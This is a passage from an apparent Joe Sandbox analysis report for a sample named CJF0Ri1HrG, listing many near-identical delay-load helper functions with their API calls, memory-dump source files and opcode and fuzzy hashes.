                                                                                        • Opcode ID: c77434ca87b80a591aaf3171fa47f44f0af2d9a426c86ec4a3ce85c34147dcf0
                                                                                        • Instruction ID: 50e6aba53d22dd0b01554b9d5c7cface5568bb1468395fcfc6c1be57f9631c2d
                                                                                        • Opcode Fuzzy Hash: c77434ca87b80a591aaf3171fa47f44f0af2d9a426c86ec4a3ce85c34147dcf0
                                                                                        • Instruction Fuzzy Hash: 94B012D5368140BC3257F2465C03E37010CC5C9F10330C17EF82DC5680D8446C440532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: de7277d1c416452ca50501c89ff71123e9fdeb30b39d3120c3c2aae888ac2171
                                                                                        • Instruction ID: 729be0c4b45bb967abb4285b6f2bd892adfbcd5385d875275535c6214e147c80
                                                                                        • Opcode Fuzzy Hash: de7277d1c416452ca50501c89ff71123e9fdeb30b39d3120c3c2aae888ac2171
                                                                                        • Instruction Fuzzy Hash: 6FB012D5268000BC3217F2475D03E37010CC5C9F10330C07EF82DC5680DC546D091532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 891f19af71cd6fd9dd8c291a7bc2da6693dfee54198a71a144c4e31eeaeaaaa9
                                                                                        • Instruction ID: 0a1ce1d32086557acd7eed67ba5063f8ea987c1da0db4754358771d95a699cfd
                                                                                        • Opcode Fuzzy Hash: 891f19af71cd6fd9dd8c291a7bc2da6693dfee54198a71a144c4e31eeaeaaaa9
                                                                                        • Instruction Fuzzy Hash: 5FB012D5279040BC3257E1465C03E77014DC5C9F10330C07EF82EC5480D8446C000533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 7f03f550b2b2698b9a163b17f6cd0f3b2f000a5850029dcd5655af1cf0455b30
                                                                                        • Instruction ID: c9e3931fb23212cd6a1a342254aaef2ba676c69c84a07d8ff50d01ef5d0b1f61
                                                                                        • Opcode Fuzzy Hash: 7f03f550b2b2698b9a163b17f6cd0f3b2f000a5850029dcd5655af1cf0455b30
                                                                                        • Instruction Fuzzy Hash: 4BB012D526C000BC3217F1565C03E37014CC1CAF10330C07EFC2DC5480D844BC000532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 91e79a84e3f1d8210cc8447a9faa359fb78cb5e3a076bada7df9e3dd252e910d
                                                                                        • Instruction ID: 92591b497afb6c5565819e7c216c8c52771729846ff636931420a11e5fbee9a0
                                                                                        • Opcode Fuzzy Hash: 91e79a84e3f1d8210cc8447a9faa359fb78cb5e3a076bada7df9e3dd252e910d
                                                                                        • Instruction Fuzzy Hash: F3B012E5269140BC3297E2465C03E37010DC1C9F10330C17EF82DC5480D844AC440533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 76f8af1ae1217f8ab8a89c27a55ac99c80af2301d1af114863100490491399ca
                                                                                        • Instruction ID: 21b2a0da6d51687e14cb9c72cafa5c87fe3b7cc77a2496a1bef1ba32458981de
                                                                                        • Opcode Fuzzy Hash: 76f8af1ae1217f8ab8a89c27a55ac99c80af2301d1af114863100490491399ca
                                                                                        • Instruction Fuzzy Hash: 31B012D52A9040BC3257F1465C03E37010DC1CAF10330C07EFC2DC5480D844AC000533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E2B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 0b65b2cf07a250d7cc035653b9cb38607d0f989d35c61d1e13021e1b113ac933
                                                                                        • Instruction ID: f4d85a152e03b369b9eb2886ab3f250bb320aef0f8e434e7687598dc6f2a29ed
                                                                                        • Opcode Fuzzy Hash: 0b65b2cf07a250d7cc035653b9cb38607d0f989d35c61d1e13021e1b113ac933
                                                                                        • Instruction Fuzzy Hash: 8EB012D5268000BC3227E1465C03EB7010CC1C9F10330C47EF82DC54C0D8446C001532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 7e971c4b5939856c53f0a744db94c9438a13a629cbfe55b5730eba9921985366
                                                                                        • Instruction ID: dca9b036d019c552d3473f171b235b1a8200589e6dc13a75fbb1e6e4b21cfc02
                                                                                        • Opcode Fuzzy Hash: 7e971c4b5939856c53f0a744db94c9438a13a629cbfe55b5730eba9921985366
                                                                                        • Instruction Fuzzy Hash: AEB012E526C000BC3217E1475D03E37018CC1C9F10330C07EF82DC5480DC457D010532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037EAF9
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 3To
                                                                                        • API String ID: 1269201914-245939750
                                                                                        • Opcode ID: cff87c8c806430b89156c30997438238dad289a942f3605998dee7144ee14c86
                                                                                        • Instruction ID: d20517389d2483cf541ab1fa457bded80f95770ebb165bb7952ab63c46f24f42
                                                                                        • Opcode Fuzzy Hash: cff87c8c806430b89156c30997438238dad289a942f3605998dee7144ee14c86
                                                                                        • Instruction Fuzzy Hash: E8B012CB2EA052BC365762001D02D37021CD4C4F90330D06EF529C8481DC844C010433
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: 18e9087f091198a78ace68aaab65cf666a6e6d0ee143b51f495a754a03e93059
                                                                                        • Instruction ID: ad319b83592a46177ea284a561477528627fca81665ef4371567f9fe5464d716
                                                                                        • Opcode Fuzzy Hash: 18e9087f091198a78ace68aaab65cf666a6e6d0ee143b51f495a754a03e93059
                                                                                        • Instruction Fuzzy Hash: 10B012CA2681007C321721241D06E7B021CC0C6F20330D07EF439C4881A8454D040432
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: 9b92a09197f11ad023a14b60e2c3e3042242b0e8900af7e10f4ecf42550c5806
                                                                                        • Instruction ID: d8ae37180091c1e88ade8030b08fb163bd9af1908f9089842cdfa3db4bc4b49a
                                                                                        • Opcode Fuzzy Hash: 9b92a09197f11ad023a14b60e2c3e3042242b0e8900af7e10f4ecf42550c5806
                                                                                        • Instruction Fuzzy Hash: 71B012CA2681007C331761085D03E3B021CC0CBF20330D26EF42DC4480E8444C440532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        • Opcode ID: 21ecaaf338a3d945777b6fdaebc93a7d4ac84789cb097cc3508a5ea10628af69
                                                                                        • Instruction ID: 7c0ecd5c2690befd2e96460f9c33edae51010224d88e13f1baf1f42e004a1fdf
                                                                                        • Opcode Fuzzy Hash: 21ecaaf338a3d945777b6fdaebc93a7d4ac84789cb097cc3508a5ea10628af69
                                                                                        • Instruction Fuzzy Hash: 4DB012C52681007C325761545C03E37012CC0CAF20338D26EF42CC9480E8444C401532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        • Opcode ID: 94e0cc7fedcfdc3599c0bc6ea0e966ccfd6e0146ececde5487bc168890dc14f9
                                                                                        • Instruction ID: 170a4395ab6eded5c37d4085bcb10247242064b2b24bc4a1bd960c5860f675fc
                                                                                        • Opcode Fuzzy Hash: 94e0cc7fedcfdc3599c0bc6ea0e966ccfd6e0146ececde5487bc168890dc14f9
                                                                                        • Instruction Fuzzy Hash: 39B012C52680007C321761555D02E37012CC0CAF20338D26EF42CC9480EC444D011532
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        • Opcode ID: 3e957baf5a1c476cabf278ab2bbd5fcd7c4fc4bea79d142b3cba2c9f5dd23d4f
                                                                                        • Instruction ID: 8cfed1db0d98d802ff8ab5ed68b2ffa2c132a30abf874781ede686d4abd40645
                                                                                        • Opcode Fuzzy Hash: 3e957baf5a1c476cabf278ab2bbd5fcd7c4fc4bea79d142b3cba2c9f5dd23d4f
                                                                                        • Instruction Fuzzy Hash: 24B012C62680047D321761541C02E77011CD0C9F20335D06EF42CC9480E8484C001533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
